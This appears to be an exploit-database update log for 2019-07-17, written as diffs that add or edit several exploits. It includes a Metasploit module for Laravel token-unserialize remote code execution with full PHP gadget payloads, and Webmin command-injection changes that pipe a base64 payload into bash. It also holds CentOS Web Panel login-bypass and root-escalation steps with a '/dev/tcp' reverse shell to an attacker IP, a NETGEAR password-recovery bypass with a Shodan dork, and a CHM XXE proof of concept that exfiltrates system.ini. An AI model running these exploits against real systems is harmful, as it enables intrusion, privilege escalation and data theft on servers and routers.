DB: 2019-07-17

10 changes to exploits/shellcodes

Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection
R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)
DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)
Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)

PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)
CentOS Control Web Panel 0.9.8.836 - Authentication Bypass
CentOS Control Web Panel 0.9.8.836 - Privilege Escalation
CentOS Control Web Panel 0.9.8.838 - User Enumeration

exploits/hardware/webapps/47117.txt

@@ -38,22 +38,23 @@ download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS ||
 
 
 
-# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure
 # Date: 13/07/2019
 # Exploit Author: Wadeek
-# Hardware Version: R6080-100PES
+# Hardware Version: JWNR2010v5
-# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Firmware Version: 1.1.0.54
-# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx
-# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip
+# Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5"
 
 == Files Containing Juicy Info ==
 >> http://192.168.1.1/currentsetting.htm
-Firmware=V1.0.0.34WW
+Firmware=V1.1.0.54
-Model=R6080
+Model=JWNR2010v5
->> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+>> http://192.168.1.1/BRS_netgear_success.html (Serial Number)
-<serialNumber>SSSSSSSNNNNNN</serialNumber>
+setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000);
 
-== Security Questions Bypass > Answers Disclosure ==
+== Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") ==
 >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
 <POST REQUEST>
 htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
@@ -62,14 +63,14 @@ dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=sec
 (by)
 dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
 <POST RESPONSE>
-<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
+<input type="text" maxLength="64" size="30" name="htpwd_answer1" onFocus="this.select();" value="AnSw3R-1">
-<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
+<input type="text" maxLength="64" size="30" name="htpwd_answer2" onFocus="this.select();" value="AnSw3R-2">
 (repeat recovery process for get admin password)
 
 == Authenticated Telnet Command Execution ==
 >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
 :~$ telnet 192.168.1.1
-R6080 login: admin
+JWNR2010v5 login: admin
 Password: Str0nG-!P4ssW0rD
 {
 upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]

exploits/linux/remote/46984.rb

@@ -10,12 +10,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
+      'Name'           => 'Webmin Package Updates Remote Command Execution',
       'Description'    => %q(
         This module exploits an arbitrary command execution vulnerability in Webmin
         1.910 and lower versions. Any user authorized to the "Package Updates"
         module can execute arbitrary commands with root privileges.
-
       ),
       'Author'         => [
         'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
@@ -23,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['CVE', '2019-'],
+          ['CVE', '2019-12840'],
           ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
         ],
       'Privileged'     => true,
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'RPORT' => 10000,
           'SSL'   => false,
-          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
+          'PAYLOAD' => 'cmd/unix/reverse_perl'
         },
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
@@ -63,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri, 'session_login.cgi'),
-      'cookie' => 'testing=1',
+      'cookie' => 'testing=1', # it must be used for "Error - No cookies"
       'vars_post' => {
         'page' => '',
         'user' => datastore['USERNAME'],
@@ -78,32 +77,43 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil unless res
     ''
   end
-##
+
-# Target and input verification
-##
   def check
     cookie = login
     return CheckCode::Detected if cookie == ''
     return CheckCode::Unknown if cookie.nil?
 
     vprint_status('Attempting to execute...')
-    # check package update priv
+    # check version
     res = send_request_cgi({
-      'uri'     => normalize_uri(target_uri.path, "package-updates/"),
+      'method' => 'GET',
-      'cookie'  => "sid=#{cookie}"
+      'uri'    => normalize_uri(target_uri.path, "sysinfo.cgi"),
+      'cookie'  => "sid=#{cookie}",
+      'vars_get' => { "xnavigation" => "1" }
     })
 
-    if res && res.code == 200 && res.body =~ /Software Package Update/
+    if res && res.code == 302 && res.body
-      print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+      version = res.body.split("- Webmin 1.")[1]
-      return CheckCode::Vulnerable
+      return CheckCode::Detected if version.nil?
+      version = version.split(" ")[0]
+      if version <= "910"
+        # check package update priv
+        res = send_request_cgi({
+          'uri'     => normalize_uri(target_uri.path, "package-updates/"),
+          'cookie'  => "sid=#{cookie}"
+        })
+
+        if res && res.code == 200 && res.body =~ /Software Package Update/
+          print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+          return CheckCode::Vulnerable
+        end
+      end
     end
-    print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
+    print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
     print_status("Please try with another user account!")
     CheckCode::Safe
   end
-##
+
-# Exploiting phase
-##
   def exploit
     cookie = login
     if cookie == '' || cookie.nil?
@@ -111,43 +121,36 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     print_good("Session cookie: #{cookie}")
 
-    res = send_request_raw(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
-      'headers' =>
+      'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
-        {
+      'cookie' => "sid=#{cookie}"
-          'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
-        },
-      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
     )
     unless res && res.code == 200
       fail_with(Failure::Unknown, 'Request failed')
     end
 
     print_status("Attempting to execute the payload...")
-    exec(cookie)
+    run_update(cookie)
-
   end
 
-  def exec(cookie)
+  def run_update(cookie)
-
+    @b64p = Rex::Text.encode_base64(payload.encoded)
-    command = payload.encoded
+    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+    payload = Rex::Text.uri_encode(perl_payload)
 
     res = send_request_cgi(
       {
-      'method' => 'POST',
+        'method' => 'POST',
-      'cookie' => "sid=#{cookie}",
+        'cookie' => "sid=#{cookie}",
-      'ctype'  => 'application/x-www-form-urlencoded',
+        'ctype'  => 'application/x-www-form-urlencoded',
-      'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+        'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
-      'headers' =>
+        'headers' =>
-        {
+          {
-          'Referer' => "#{peer}/package-updates/?xnavigation=1"
+            'Referer' => "#{peer}/package-updates/?xnavigation=1"
-        },
+          },
-      'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
+        'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
       })
-
   end
-end
+end
-##
-# The end of the adventure (o_O) // AkkuS
-##

exploits/linux/remote/47129.rb

@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
+      'Description' => %q{
+        This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
+        Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
+        an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
+        Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
+        Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
+        In some cases the APP_KEY is leaked which allows for discovery and exploitation.
+      },
+      'DisclosureDate' => '2018-08-07',
+      'Author' =>
+        [
+          'Ståle Pettersen',  # Discovery
+          'aushack',          # msf exploit + other leak
+        ],
+      'References' =>
+        [
+          ['CVE', '2018-15133'],
+          ['CVE', '2017-16894'],
+          ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
+          ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
+          ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
+      'Payload' => { 'DisableNops' => true },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
+      OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    })
+
+    # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
+    unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
+      return CheckCode::Unknown
+    end
+
+    auth_token = check_appkey
+    if auth_token.blank? || test_appkey(auth_token) == false
+      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+      return CheckCode::Detected
+    end
+
+    random_string = Rex::Text.rand_text_alphanumeric(12)
+
+    1.upto(4) do |method|
+      vuln = generate_token("echo #{random_string}", auth_token, method)
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+          'X-XSRF-TOKEN' => "#{vuln}",
+        }
+      })
+
+      if res.body.include?(random_string)
+        return CheckCode::Vulnerable
+      # Not conclusive but witnessed in the wild
+      elsif res.body.include?('Method Not Allowed')
+        return CheckCode::Safe
+      end
+    end
+    CheckCode::Detected
+  rescue Rex::ConnectionError
+    CheckCode::Unknown
+  end
+
+  def env_leak
+    key = ''
+    vprint_status 'Checking for CVE-2017-16894 .env information leak'
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '.env'),
+      'method' => 'GET'
+    })
+
+    # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
+    return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
+    key = $1
+
+    if key
+      vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
+      return key
+    end
+
+    vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
+    key
+  end
+
+  def framework_leak(decrypt_ex = true)
+    key = ''
+    if decrypt_ex
+      # Possible config error / 0day found by aushack during pentest
+      # Seen in the wild with recent releases
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+          'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
+        }
+      })
+
+      return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
+    else
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST'
+      })
+
+      return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
+    end
+    # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
+
+    # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
+    if res.body =~ /\>base64:(.*)\<\/span\>/
+      key = $1
+      vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
+    end
+
+    key
+  end
+
+  def check_appkey
+    key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
+    return key unless key.empty?
+
+    vprint_status 'APP_KEY not set. Will try to find it...'
+    key = env_leak
+    key = framework_leak if key.empty?
+    key = framework_leak(false) if key.empty?
+    key.empty? ? false : key
+  end
+
+  def test_appkey(value)
+    value = Rex::Text.decode_base64(value)
+    return true if value && value.length.to_i == 32
+
+    false
+  end
+
+  def generate_token(cmd, key, method)
+    # Ported phpggc Laravel RCE php objects :)
+    case method
+      when 1
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+      when 2
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+      when 3
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
+      when 4
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+    end
+
+    cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
+    cipher.encrypt
+    cipher.key = Rex::Text.decode_base64(key)
+    iv = cipher.random_iv
+
+    value = cipher.update(payload_decoded) + cipher.final
+    pload = Rex::Text.encode_base64(value)
+    iv = Rex::Text.encode_base64(iv)
+    mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
+    iv = iv.gsub('/', '\\/') # Escape slash
+    pload = pload.gsub('/', '\\/') # Escape slash
+    json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
+    json_out = Rex::Text.encode_base64(json_value)
+
+    json_out
+  end
+
+  def exploit
+    auth_token = check_appkey
+    if auth_token.blank? || test_appkey(auth_token) == false
+      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+      return
+    end
+
+    1.upto(4) do |method|
+      sploit = generate_token(payload.encoded, auth_token, method)
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+        'X-XSRF-TOKEN' => sploit,
+        }
+      }, 5)
+
+      # Stop when one of the deserialization attacks works
+      break if session_created?
+
+      if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
+        print_status 'Target appears to be patched or otherwise immune'
+      end
+    end
+  end
+end

exploits/linux/webapps/47123.txt

@@ -0,0 +1,89 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for latest version
+# Version: 0.9.8.836 to 0.9.8.846
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13360, CVE-2019-13605
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product             : CWP Control Web Panel
+Vulnerability Name  : User panel bypass Login
+version             : 0.9.8.836
+Fixed on            : 0.9.8.848
+Test on             : CentOS 7.6.1810 (Core)
+Reference           : http://centos-webpanel.com/
+                    : https://control-webpanel.com/changelog
+CVE-Number          : CVE-2019-13605
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+After login success, the application will retuens base64 value and use it to authenticate again,
+That allow attacker to modify the response and become a user
+
+# ====================================================================
+# Response format (version 0.9.8.836 to 0.9.8.837)
+# ====================================================================
+
+<username>||/<username>/theme/original
+
+
+
+# CVE-2019-13360
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
+# ====================================================================
+
+1. Login with valid username and invalid password
+2. Replace the target username in "<username>||/<username>/theme/original"
+3. Convert to base64
+4. Place the base64 value to HTTP response body
+5. Gain access to user area
+
+
+# CVE-2019-13605
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
+# ====================================================================
+
+1. Create a testing environment
+	1.1 Create user as a target username
+	1.2 Login as the user
+	1.3 Save the HTTP response body (token value)
+2. Login to the real target with valid username and invalid password
+3. Place the value we saved from step 1.3 in HTTP response body
+4. Gain access to user area
+
+*The response value format is depends on version, just replace the hole value
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-07: Discovered the bug
+2019-07-07: Reported to vendor
+2019-07-07: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Advisory published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee

exploits/linux/webapps/47124.txt

@@ -0,0 +1,105 @@
+//====================================================================\\
+||                                                                     ||
+||           CWP Control Web Panel 0.9.8.836 - 0.9.8.839               ||
+||                     Root Privilege Escalation                       ||
+||                                                                     ||
+\\====================================================================//
+
+# ====================================================================
+# Information
+# ====================================================================
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
+version in the script)
+# Version: 0.9.8.836 to 0.9.8.839
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13359
+
+Product             : CWP Control Web Panel
+Vulnerability Name  : Root Privilege Escalation
+version             : 0.9.8.836
+Fixed on            : 0.9.8.840
+Test on             : Tested on: CentOS 7.6.1810 (Core)
+Reference           : http://centos-webpanel.com/
+                    : https://control-webpanel.com/changelog
+CVE-Number          : CVE-2019-13359
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+1. The session file are store at /tmp directory
+2. rkey value in the session file dose not change when access by the same source IP address
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+Session prepareation state
+    1. Check the current IP address of attacker
+    2. Set the IP address on testing environment network
+    3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
+    4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456"                  # we need "rkey"
+    5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)
+
+    * rkey is created from client ip, then do not change client ip when attack the real target
+
+Attack state
+
+    #
+    #   Method 1 Uploading via reverse shell
+    #
+
+    1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
+    2. Create session file through reverse shell
+
+        echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456
+
+    3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+    4. Change file permission "chmod 664 /tmp/sess_123456"
+    5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+    6. Open the URL and become the root user
+
+
+    #
+    # Method 2 Uploading via File manager function
+    #
+
+    1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
+    2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+    3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+    4. Open the URL and become the root user
+
+    *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-06-30: Discovered the bug
+2019-06-30: Reported to vendor
+2019-06-30: Vender accepted the vulnerability
+2019-07-02: The vulnerability has been fixed
+2019-07-06: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak

exploits/linux/webapps/47125.txt

@@ -0,0 +1,119 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
+# Date: 15 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for lastest version
+# Version: 0.9.8.836 to 0.9.8.847
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13383
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product     : CWP Control Web Panel
+version     : 0.9.8.838
+Fixed on    : 0.9.8.848
+Test on     : CentOS 7.6.1810 (Core)
+Reference   : https://control-webpanel.com/
+CVE-Number  : 2019-13383
+
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+The server response different message between login with valid and invalid user.
+This allows attackers to check whether a username is valid by reading the HTTP response.
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+1. Login with a random user by using invalid password
+
+POST /login/index.php?acc=validate HTTP/1.1
+Host: 192.168.80.137:2083
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+csrftoken: d41d8cd98f00b204e9800998ecf8427e
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Connection: close
+Referer: https://192.168.80.137:2083/login/?acc=logon
+
+username=AAA&password=c2Rmc2Rm
+
+
+
+2. Check the HTTP response body
+
+2.1 User does not exist (server response suspended)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:39:06 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 9
+
+suspended
+
+
+2.2 User does exist (server response nothing)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:40:12 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 0
+
+
+
+3. HTTP response body format depends on software version, but all of them keep responding differently as the example below
+
+------------------------------------------------------------
+|  Username  |	 Password   |   Result                     |
+
+------------------------------------------------------------
+|  valid     |	 valid	    |   login success              |
+
+|  valid     |	 invalid    |	{"error":"failed"}         |
+
+|  invalid   |	 invalid    |	{"error":"user_invalid"}   |
+------------------------------------------------------------
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-06: Discovered the bug
+2019-07-06: Reported to vendor
+2019-07-06: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak

exploits/windows/dos/47127.txt

@@ -0,0 +1,105 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Compiled HTML Help "hh.exe"
+
+Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
+The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
+CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
+
+
+[Vulnerability Type]
+Uncompiled .CHM File XML External Entity Injection
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
+simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
+Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.
+
+Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
+having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. 
+
+While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
+create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
+
+Note: User interaction is required to exploit this vulnerability.
+
+
+[Exploit/POC]
+1) python -m SimpleHTTPServer
+
+
+2) "XXE.chm.chm"
+
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
+<HTML>
+<HEAD>
+<Title>Uncompiled CHM File XXE PoC</Title>
+</HEAD>
+<BODY>
+<xml>
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE tastyexploits [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+</xml>
+</BODY>
+</HTML>
+
+
+3) "payload.dtd"  (hosted in python web-server dir port 81 above)
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
+%all;
+
+
+Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
+
+Tested successfully Windows 7/10
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=iaxp1iBDWXY
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: April 25, 2019
+MSRC Response: "We determined that this behavior is considered to be by design"
+July 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/47122.py

@@ -0,0 +1,82 @@
+#!/usr/bin/python
